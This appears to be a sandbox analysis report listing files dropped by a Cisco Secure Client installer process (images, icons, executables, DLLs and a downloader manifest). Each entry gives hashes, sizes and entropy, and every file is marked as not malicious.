                                                                                                                                      SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                      SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9482
                                                                                                                                      Entropy (8bit):7.969513879342907
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                      MD5:21841588532E34397E478E791A064F2C
                                                                                                                                      SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                      SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                      SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11747
                                                                                                                                      Entropy (8bit):7.9792800328394184
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                      MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                      SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                      SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                      SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12124
                                                                                                                                      Entropy (8bit):7.978101118980993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                      MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                      SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                      SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                      SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8594
                                                                                                                                      Entropy (8bit):7.973082494080156
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                      MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                      SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                      SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                      SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4117
                                                                                                                                      Entropy (8bit):7.943813748161345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                      MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                      SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                      SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                      SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4267
                                                                                                                                      Entropy (8bit):7.94257084168463
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                      MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                      SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                      SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                      SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4052
                                                                                                                                      Entropy (8bit):7.943954771539964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                      MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                      SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                      SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                      SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):700
                                                                                                                                      Entropy (8bit):6.305816801627044
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2106
                                                                                                                                      Entropy (8bit):7.848629133083243
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):478
                                                                                                                                      Entropy (8bit):7.3703130572324955
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2245
                                                                                                                                      Entropy (8bit):7.881067272381913
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):543
                                                                                                                                      Entropy (8bit):7.547901309478316
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.836409910643584
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):417
                                                                                                                                      Entropy (8bit):7.261808950496785
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1856
                                                                                                                                      Entropy (8bit):7.845521158056495
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):472
                                                                                                                                      Entropy (8bit):7.339402871750466
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.5904244181066343
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.612237043911612
                                                                                                                                      Encrypted:false
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4144936482461397
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                      MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                      SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                      SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                      SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11585
                                                                                                                                      Entropy (8bit):7.961332304899258
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                      MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                      SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                      SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                      SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2465
                                                                                                                                      Entropy (8bit):7.9078675566370515
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                      MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                      SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                      SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                      SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3638
                                                                                                                                      Entropy (8bit):7.889316799889741
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                      MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                      SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                      SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                      SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4370
                                                                                                                                      Entropy (8bit):7.900909498577029
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                      MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                      SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                      SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                      SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5558
                                                                                                                                      Entropy (8bit):4.450533821817726
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                      MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                      SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                      SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                      SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9736
                                                                                                                                      Entropy (8bit):7.95835565935799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                      MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                      SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                      SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                      SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2002
                                                                                                                                      Entropy (8bit):7.874049849617631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                      MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                      SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                      SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                      SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1006184
                                                                                                                                      Entropy (8bit):5.97738342017222
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:9/9IZHQOBWLxPXdwWeKHI0+DPwYZC3Yeba96ga8nXNBZK/8id:9V2HQO6PqtPwJ3Yijg/dB0Ei
                                                                                                                                      MD5:744D2DC7CA442E065AC4F23C6A7B9E5F
                                                                                                                                      SHA1:0039BE9938086F925F321EC8B2FD4D008F600C1A
                                                                                                                                      SHA-256:4E9E9F15FFBFC9729F4BC561D8670214A86822D682F49A2B286BB798FD59B549
                                                                                                                                      SHA-512:918009B74EAF5CD932E7BFE1CBD65425917D8CFCDB32B6A10FF2DD44A894E06DA77544522B72F77880D1ADD9961DB0A3401CC20242976E241499F65899E76826
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):451
                                                                                                                                      Entropy (8bit):3.838636988372643
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:3FFU5eWNwSrzakk5CGvFF6cqEPtvFFEHxiulEk9bkNy4SQUa:1e5eU/aHHAcqE/uxiTKTM
                                                                                                                                      MD5:F31B286BC9DAC414CAE57B36020FDB4A
                                                                                                                                      SHA1:BD9D861EA0BC7DBDB9A1C9949ADFB7BDF3345C6B
                                                                                                                                      SHA-256:7778B7BB7E7F9D25D71747BAA3BEB76E39C0336EB9DA0D823D7C6297540E7975
                                                                                                                                      SHA-512:937B660BDD91A8467DB83F9B5B25046D0443EB2648671CE420F9A032123A479B249B9001D860BDA4FE3488065F0FF02AD01BA758CB11EE07710C7651FA072945
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "downloader" : {.. "display-name" : "Cisco Secure Client - Downloader",.. "type" : "exe",.. "uri" : "binaries/vpndownloader.exe",.. "hash" : "7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3",.. "hash-type" : "sha256",.. "version" : "5.0.05040".. }..}..
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):745576
                                                                                                                                      Entropy (8bit):6.225379685413281
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:Qx5TysIG9cavT2FWgBKkuD/wQoJ4GMJzu:cxIGKavT2FWz/wQffzu
                                                                                                                                      MD5:DB9F087F33F5375F0883F4E29F81074C
                                                                                                                                      SHA1:1D9715CDFA425F4F6FA14D80233B9ECE8F9AA89E
                                                                                                                                      SHA-256:5D27CE634581F9CEE12C17D9F4AD6AB1B7C6BCDBB911618E7416D2FB4F1981F0
                                                                                                                                      SHA-512:A740845C79909898881742BA552F8358EE35EA33077A41EA2F9BC4FA824923956AFB1AB3D7870FEE626110BB51FC347AC3D04A2D84747D99EA98B1F3E9FB98C0
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):119912
                                                                                                                                      Entropy (8bit):6.60185962501979
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:pykiJ1Z1K95jvS8BBw/qZqocqQThEt9WSt6MlNNp:MkiHTMBBaNEtUS9lNz
                                                                                                                                      MD5:E418E6429D29325A842E8A5F01B57236
                                                                                                                                      SHA1:D075045BC923F0AD63907CDF47AF6FE7B40DB49C
                                                                                                                                      SHA-256:EAD03108A441D27DC347649DDA3F5BBD2144B5EC35B775944761F7BBFFC95CB2
                                                                                                                                      SHA-512:92969A8394DF09973DE2F5E8A528A41EC046B5C0CCA3292CD734DF900AF1EB85A3C8643273051D1E2B27B82EC992D61559A9BB06A4B49064FECCB64EB35D2876
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):286824
                                                                                                                                      Entropy (8bit):6.617095335993768
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:tnTXBb1av9tRiTYNC2s2jSPah5WQXR+1XAOtMFK:Lcv9tRiUNLV+1XHf
                                                                                                                                      MD5:A46C978EB55D64043AAC769320503C12
                                                                                                                                      SHA1:60AD2BB287B1E6F768EA873B1390ACA13A853999
                                                                                                                                      SHA-256:19E4270B838CBC3054175427E9C5DA3BBACD92A0E69ECE036C490FC3F13302B1
                                                                                                                                      SHA-512:DFD94979A6AD9AF454C40324A42FD83CB0F14E2EEFEBF81810DEB5A4A24E0EA3B6466E0D28E32BBC0192D732B9D6B2429843E22F7E07F42D2EBE5835A3E47ACE
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1865320
                                                                                                                                      Entropy (8bit):6.970258455602142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:cN4UkzzVwcS5/h2m7tPpbO8in1CPwDv3uFbvYdkYuj:cNb/h26XbO8K1CPwDv3uFbv3
                                                                                                                                      MD5:401E2AAFE861E1BBCC04EEED82868DBF
                                                                                                                                      SHA1:D4ADD73521989319137E731485CE64DC370AAFE6
                                                                                                                                      SHA-256:09EF0662458A6B07BC5B063576981CACF74E7E7B3FD355FF6EF49395A8D95183
                                                                                                                                      SHA-512:891731F36B327E2B33AC31C39E869D8FE4CB4A7B289F3183857A0671C5DACA700552A5EAF29A07AC537330B57A0C45DC27DDE8AA5B7AC33C9F8A6F8E9B1EE968
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):449128
                                                                                                                                      Entropy (8bit):6.524987350757864
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:H42omt0CD5eYwFZ6depVyQ7YAf1ZMGnz8J4N4OTW8kd6ghNu99hO5nxjOE6ARsMp:LqN4//sHTTHx4KtsutnLlEa2
                                                                                                                                      MD5:5608F2FEEEC9519ABC4C45AD6156F224
                                                                                                                                      SHA1:55B1E59342A3F0011714E146A0FFDB52CDE267DD
                                                                                                                                      SHA-256:3DEC5D47533E9DCCAF3F851DE4D37E289407CB9064CD1F32ADD08D2ABFAB75D4
                                                                                                                                      SHA-512:FF605F0F7EC45BE82696D1FAB43D74C59991AFC692C61674CA7317DF1C9953EE25D65AC94910D856EB98E6D48C280D8298C54C09BA2346B9A1959E9071ECF717
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347752
                                                                                                                                      Entropy (8bit):6.708372875308561
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:xS6/w5Vk2RM0ZdTNd5JYjV7JYwXhik4QNEN519X+Iw99Itmf:xS5Vk2RtZw5JYwXhpzyNttg
                                                                                                                                      MD5:84EB38D113F69752F45B9A1852536093
                                                                                                                                      SHA1:D24161590E4C7541D183A0871694DEFE92F81783
                                                                                                                                      SHA-256:276C98884E9945BC79AB4D84069CFE543752FBD064E88EE78DE0256F8B1DF374
                                                                                                                                      SHA-512:0B69B29809915DFC348AD36E528BE4DE5E251F30AA7E3FA1017F1F3A24FF315C4F5290423D15C62AA3E4F3AFA573362675177EC05E48B78FA2995C2D5F5BD310
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):491624
                                                                                                                                      Entropy (8bit):6.495709095629098
                                                                                                                                      Encrypted:false
